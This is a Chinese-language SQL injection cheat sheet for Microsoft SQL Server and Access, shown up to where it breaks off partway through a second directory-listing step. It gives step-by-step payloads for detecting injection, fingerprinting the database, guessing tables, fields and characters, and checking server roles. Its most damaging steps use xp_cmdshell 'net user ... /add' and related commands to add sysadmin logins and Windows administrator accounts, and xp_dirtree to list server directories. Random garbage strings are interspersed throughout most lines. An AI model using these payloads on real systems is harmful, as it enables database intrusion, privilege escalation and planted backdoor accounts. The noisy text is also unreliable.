1.判断是否有注入;and 1=1 ;and 1=2 PDpDkcy|QM
2.初步判断是否是mssql ;and user>0 (4IH%Ez){
R@2*Lgxz~
3.注入参数是字符'and [查询条件] and ''=' P=.T|l1
^TAf+C^Ry
4.搜索时没过滤参数的'and [查询条件] and '%25'=' 3e1^r_YI
T*rz#O
5.判断数据库系统 S{UEV7d:n0
M+WN \.2pX
;and (select count(*) from sysobjects)>0 mssql c> ":g~w
%
{A%SDh
;and (select count(*) from msysobjects)>0 access yAu.=Eo7
+z+u=)I
34t[]v|LD
9C:V i
6.猜数据库 ;and (select Count(*) from [数据库名])>0 j!K{1s[.y
Duq.`XO
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 $;j{?dvm.
TTo5"r9I8
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 [ip}f4K
TchByN6oN<
9.(1)猜字段的ascii值(access) |qtZb}"|
J+YoAf`hi
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 D3x
W?$Z
rXVRX#Lh
(2)猜字段的ascii值(mssql) -!X\xA/KN
Ee'wsL
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0
iM"L%6*I^
?A~a}bFZ
10.测试权限结构(mssql) v+
"9&
+uMK_ds~
Q`BB@E
cL:hjr"
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 3j w4#GW
yi,Xs|%.
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- bqRO-\vO
'|nAGkA
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- F*=}}H/
8s>OO&
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- fi'\{!!3m^
VX e7b
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- qnnP*15`
P*kC>lvSv
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- eKL3Y_5p@
cTLW}4m%g
;and 1=(select IS_MEMBER('db_owner'));-- La\|Bwx
DpQ:U 5j
XO}v8nWV
w s7LDY&(
11.添加mssql和系统的帐户 w>&g'
RNb" O{3
;exec master.dbo.sp_addlogin username;-- PRN%4G
;exec master.dbo.sp_password null,username,password;-- e# KP3Lp
:jGgX>GG
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- TTz_w-68
[+b&)jN*2
;exec master.dbo.xp_cmdshell 'net user username password %^bN^Sq
-
DaqpveKa
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 77;|PKE /
`,)%<}
;exec master.dbo.xp_cmdshell 'net user username password /add';-- M$2lK^2L
@T~~aQFk
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- r8Z}
mvLM
n hGh5,
t#=FFQOt
z_ L><}H
12.(1)遍历目录 B{ cb'\C
3=IY0Q>/(
;create table dirs(paths varchar(100), id int) J;Veza
Vn6]h|vm
;insert dirs exec master.dbo.xp_dirtree 'c:\' !p(N
DQm
Ky)*6QOw
;and (select top 1 paths from dirs)>0 ^zR*s |1Q
{Zf 9}
!qF
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) _yc&'Wq
?9;r|G
A(wuRXnVWK
!k8j8v&
(2)遍历目录 W.TdhJW9
"sUmk e-#
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- y\<